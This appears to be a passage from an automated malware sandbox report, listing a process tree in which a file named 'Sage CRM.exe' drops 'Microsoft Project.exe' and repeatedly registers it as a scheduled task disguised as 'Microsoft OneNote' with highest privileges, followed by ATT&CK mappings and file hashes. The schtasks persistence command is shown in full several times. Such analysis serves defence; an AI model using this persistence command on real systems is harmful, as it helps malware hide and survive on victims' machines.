C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:1020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4820 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:1608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:1840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:2980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4648 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:3240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:4144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1852 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:22⤵PID:2056
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:348
-
C:\Users\Public\Documents\Sage CRM.exe"C:\Users\Public\Documents\Sage CRM.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:4944 -
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4116
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1544
-
-
-
C:\Users\Admin\Documents\Microsoft Project.exe"C:\Users\Admin\Documents\Microsoft Project.exe"2⤵
- Executes dropped EXE
PID:2728 -
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵PID:4116
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:1172
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵PID:3844
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:916
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:1568
-
C:\Users\Public\Documents\Sage CRM.exe"C:\Users\Public\Documents\Sage CRM.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3700 -
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4172
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1716
-
-
-
C:\Users\Admin\Documents\Microsoft Project.exe"C:\Users\Admin\Documents\Microsoft Project.exe"2⤵
- Executes dropped EXE
PID:2720 -
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:780
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:3880
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:180
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵PID:4032
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit3⤵PID:2976
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST4⤵PID:2404
-
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3fd5055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1592
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
3Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD50fa426cfe9fd591aec70ca5ad907c890
SHA17d0f18d1ee2a8aa9290ad6d8d0a3de4689d06fa7
SHA25651e459a9b25646d8f218a700e4caf5b7444d30681593943264143d7a8aeb1f7c
SHA5125ea0251ed3e8570ffcbe971358cfab5a1e5549b9f207a8e561cbdff2497f7087ba24b11d968d6fa510137651c36d622955695989001e7d20069b60f2c63ef756
-
Filesize
1KB
MD57a360f1a35118757d9b3d9f49d48b92a
SHA195bb7219bcaa6893472a5038f181b25607a013e6
SHA256c4b40ad83d681cc96aee6cce7fc2f359d404b0aecea8b6e0c69d030a647e5a78
SHA512ff19dc652bd37a726010cf80863066a8af0272fe6278e0f09600d207d14982e0b05106a2406122d12e235f66c07aeb8e140c66a1269c431565f4146a28c5fbea
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
354B
MD5e87cd741a3fb098b8eef5617a978dc04
SHA1465064bd199041fb311569c8fe21e8560766cb0b
SHA2568546303eaf29a3c47095367d835bcaf13b053a181c3c48c21beea245ec1609c5
SHA5120527c6037d86f2aa00a3d67d5cb850f89c3717a3e6f5af718250b6ba19c367fc2920955fe72f9636421fed746405bc11168cfda74562ff27337d35b326dd529f
-
Filesize
7KB
MD5ba82d7b8b9d88dabca89b911fe39013f
SHA1ae70bc26e3e703528fc73c70c822e9df5b3a426d
SHA256e09aed6e1dddebce1547efe99f673e23fb2fd2171aed7c2d7e23795817e53a8c
SHA51294fe025896c15f30cfaee40d02821eef8360ef290016855fb3153193c30af6d98d7d6b92fea54771be7cde5ffd2a008ccb03cc7dc4bd75542fbe31be3d3dbf73
-
Filesize
7KB
MD5fe740eb5d974c4effc0954117e525f99
SHA1da647dee144fb21b9f1c2efe754a533912362bb2
SHA256197fda773c0b98c40d9c7c8878a3dfd1d785b020d598fa285ad91c737587ce2c
SHA512d5b802f6824f95fb49bac6f014821d9eb8ef1060f131bb4ccb4a16f7ef2f33a82d60bb9873dcc06511d7e2c1c7b142c9ce4f9af5bc5367f9dadba674f0e75e74
-
Filesize
16KB
MD55c747837427ccbf150a8c5b24349663d
SHA1da793c398041924e9dc16cdfd54db5c4c5bef7f1
SHA256f7cfca4898da8780a5891c87dec95f79cb38d9bdd65ceb0f26bce2b1bb0f9dc4
SHA5121963852bc6c906932fa9991d383dbfeceefa660a9584cb87e47c596d334219cda623610ca8917b1d92a5b0ce65be0e2699f308ad614f7a02f88179ae507158fc
-
Filesize
260KB
MD530273ac0046c7a44bb15e17bf34ac4b2
SHA10a01a826ae26a0ac306b7cacbba0bd4431eccfa7
SHA2560d39877740371751d738379debbe468cf24e91f8623fe9ebed80a21381528488
SHA512804eb1ab92a3f1f362c7e9298062a1adf6d368ce675701752438231a0061f51cf0f522e4ec2a3baa680585e06aaeba55a34b9907acb552d35fc178df5437d011
-
Filesize
260KB
MD502cfbd5c979387c9f40d062322d5f117
SHA16dd297a75651400e4b907cf7812727ebf3129068
SHA256211045d4778b230f53721a4c0b48f8055ea812e71e915c21f7a5a1cc1674b235
SHA512a062ed4b6a655c56e1e151f02eb55594b2b7ea0c1317dbc1bdc6fc37e2ed1c5b047213d60e53d3e477cec35dc80e19dab53e22b50a900a773f600d72c8e01d09
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
256KB
MD5077f30960d9e4ee83fff7d6734fd4756
SHA188d4bfc40e94bfd1c60f8142d69ab2adfa00cddf
SHA2569999209b6d22ce028595e36c06490222dc9e56489d3595539e762c609dea5ac0
SHA512285dc9ca635cee97b1d64efcdf03a700ca5cf7b77bca7a77c1d29f5509b98b6c904b9cbcd8eb73112029ba562da731a2e4ba88eed8e08922e4f75c9a48728b0c
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
237B
MD54aadf1bee5ac55cbaee54de68b197708
SHA1f0e5efa6a8a2f704d27d078126e5c5ec41f202ac
SHA25627b506165aa040745d65f67ea71c1d7500649767483358bfb1f006ca53656fb7
SHA512832b9f5d8428254d4f46f8f90ca73b49b281f423637a8802554281499a7f77a0c17492d3ca6e1aa700dcd9d97a3d4772c1139c1c41b9f49f37a76e8b7ca87cc7
-
Filesize
167KB
MD55bbfc6ead84e7a3d272575165d1eb6af
SHA1f56916d67271b3b74557ecf4eae8c5581624445b
SHA256b73d7ee4c52c3c30b601aca91bc25ac15d81661558c0697d845a223764caab9f
SHA512b7981945b033632e691a3d8b2a790a81492e6c47c8b7c7ee50772e0c3969e25bc7f9c1ccccc2efe6b8c8e9a39f906c81f97526de3d1e403bb0ae0245e62a7753
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
485KB
MD5a0978736c1d518e2e19b61900788a138
SHA11e74b947af73692dea8448213bd8ffb0e3da7845
SHA2568ab72e2b6a93255e51e5637ed9fd7c23e4be201629fbf28f650f9ea1bef1fdca
SHA512f272048659b917f855fc455a9e7f1d8634daa813dbaf3133d26e01a8268c4bad8c1ccde7729a6dd69b7b87b8d9d761079e81d395dc00dcb7c11770ea2b0b76de
-
Filesize
258KB
MD505eed30fd6f84d4c912ed18b05eb1159
SHA10483d4e9a430aaaa9a2833a26875d25d77d718a9
SHA2567e82447b6889f880470194739bd57974205353901aa016bb726e5223d0d58f2d
SHA5127d4ceb8f40dfc2987a1479fe2645ea62e84bea037c56f2675f921b8997f08b5133e154e6cfe2f2198c48a65d68218035d36b189c7164c464c0c623a6d16fcb13
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6